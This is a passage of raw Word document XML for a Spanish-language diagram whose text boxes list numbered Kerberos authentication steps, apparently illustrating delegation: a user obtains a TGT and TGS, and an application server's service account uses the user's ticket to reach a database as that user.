                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>1. Solicitudes de usuario de dominio para TGT mediante la verificación de credenciales</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="3B12F0F6" id="Textbox 227" o:spid="_x0000_s1124" type="#_x0000_t202" style="width:226.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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="5CCE738D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="64" w:line="235" w:lineRule="auto"/>
                        <w:ind w:left="1273" w:hanging="773"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>1. Solicitudes de usuario de dominio para TGT mediante la verificación de credenciales</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:position w:val="24"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AEC6776" wp14:editId="6A49E505">
                <wp:extent cx="2880360" cy="462280"/>
                <wp:effectExtent l="9525" t="0" r="5714" b="13970"/>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462280"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="170A989A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="64" w:line="235" w:lineRule="auto"/>
                              <w:ind w:left="1367" w:hanging="752"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>5. El usuario envía TGT y TGS al servidor de aplicaciones</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="4AEC6776" id="Textbox 228" o:spid="_x0000_s1125" type="#_x0000_t202" style="width:226.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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="170A989A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="64" w:line="235" w:lineRule="auto"/>
                        <w:ind w:left="1367" w:hanging="752"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>5. El usuario envía TGT y TGS al servidor de aplicaciones</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="680C4C04" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="11"/>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30848" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2FE3D1C6" wp14:editId="51F3746B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>193547</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>291715</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2880360" cy="277495"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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77495"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="179A2AA2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="61"/>
                              <w:ind w:left="640"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>2. DC proporciona al usuario TGT</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="2FE3D1C6" id="Textbox 229" o:spid="_x0000_s1126" type="#_x0000_t202" style="position:absolute;margin-left:15.25pt;margin-top:22.95pt;width:226.8pt;height:21.85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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="179A2AA2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="61"/>
                        <w:ind w:left="640"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>2. DC proporciona al usuario TGT</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31360" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="03C5FE66" wp14:editId="5DBD3425">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7789164</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>436495</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="257810" cy="307975"/>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307975"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="26FE4E2B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="67"/>
                              <w:ind w:left="132"/>
                              <w:rPr>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:spacing w:val="-10"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>7</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="03C5FE66" id="Textbox 230" o:spid="_x0000_s1127" type="#_x0000_t202" style="position:absolute;margin-left:613.3pt;margin-top:34.35pt;width:20.3pt;height:24.25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" filled="f" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="26FE4E2B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="67"/>
                        <w:ind w:left="132"/>
                        <w:rPr>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:spacing w:val="-10"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>7</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31872" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3E8645E9" wp14:editId="4034C6A6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>9227819</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>82927</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2880360" cy="646430"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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646430"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="5A1A24DA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="60" w:line="290" w:lineRule="exact"/>
                              <w:ind w:left="4" w:right="5"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>6. Uso de la cuenta de servicio del servidor de aplicaciones</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3804B1C3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:line="288" w:lineRule="exact"/>
                              <w:ind w:left="4" w:right="4"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>el TGT del usuario para solicitar un TGS para DB</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="27245544" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:line="290" w:lineRule="exact"/>
                              <w:ind w:left="5" w:right="1"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>Servidor de DC</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="3E8645E9" id="Textbox 231" o:spid="_x0000_s1128" type="#_x0000_t202" style="position:absolute;margin-left:726.6pt;margin-top:6.55pt;width:226.8pt;height:50.9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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="5A1A24DA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="60" w:line="290" w:lineRule="exact"/>
                        <w:ind w:left="4" w:right="5"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>6. Uso de la cuenta de servicio del servidor de aplicaciones</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3804B1C3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:line="288" w:lineRule="exact"/>
                        <w:ind w:left="4" w:right="4"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>el TGT del usuario para solicitar un TGS para DB</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="27245544" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:line="290" w:lineRule="exact"/>
                        <w:ind w:left="5" w:right="1"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>Servidor de DC</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACD3116" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:before="67"/>
        <w:ind w:left="6192"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE0E797" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B217A74" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="42"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E636B84" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:ind w:right="400"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67206358" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6090103E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11CBFC3C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="599837E0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="170"/>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32384" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="43B5A153" wp14:editId="29FAD0E2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>4962144</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>278505</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="257810" cy="307975"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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307975"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="549DA3B0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="69"/>
                              <w:ind w:left="132"/>
                              <w:rPr>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:spacing w:val="-10"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>4</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="43B5A153" id="Textbox 232" o:spid="_x0000_s1129" type="#_x0000_t202" style="position:absolute;margin-left:390.7pt;margin-top:21.95pt;width:20.3pt;height:24.25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iSmQEAACIDAAAOAAAAZHJzL2Uyb0RvYy54bWysUsFuGyEQvVfqPyDuNWtHidO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" filled="f" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="549DA3B0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="69"/>
                        <w:ind w:left="132"/>
                        <w:rPr>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:spacing w:val="-10"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>4</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA4816A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:before="46"/>
        <w:ind w:left="2131" w:right="6402"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25058EB6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:before="84"/>
        <w:ind w:left="1021" w:right="6402"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15774720" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="162C3EE1" wp14:editId="3A74E9DF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>193547</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>87504</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2880360" cy="46228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462280"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="3AF07D76" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="64" w:line="235" w:lineRule="auto"/>
                              <w:ind w:left="1072" w:hanging="708"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>3. El usuario solicita un TGS para un servicio en el servidor de aplicaciones a DC</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="162C3EE1" id="Textbox 233" o:spid="_x0000_s1130" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:15.25pt;margin-top:6.9pt;width:226.8pt;height:36.4pt;z-index:1577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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="3AF07D76" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="64" w:line="235" w:lineRule="auto"/>
                        <w:ind w:left="1072" w:hanging="708"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>3. El usuario solicita un TGS para un servicio en el servidor de aplicaciones a DC</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15775232" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="323CE954" wp14:editId="65D002C5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>9601200</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>31116</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2506980" cy="64643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980" cy="646430"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="153F6AC5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="66" w:line="235" w:lineRule="auto"/>
                              <w:ind w:left="167" w:hanging="22"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>7. La cuenta de servicio del servidor de aplicaciones se conecta al servidor de base de datos como dominio</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3CEFD45E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:line="290" w:lineRule="exact"/>
                              <w:ind w:left="1754"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:spacing w:val="-4"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>usuario</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="323CE954" id="Textbox 234" o:spid="_x0000_s1131" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:756pt;margin-top:2.45pt;width:197.4pt;height:50.9pt;z-index:1577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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="153F6AC5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="66" w:line="235" w:lineRule="auto"/>
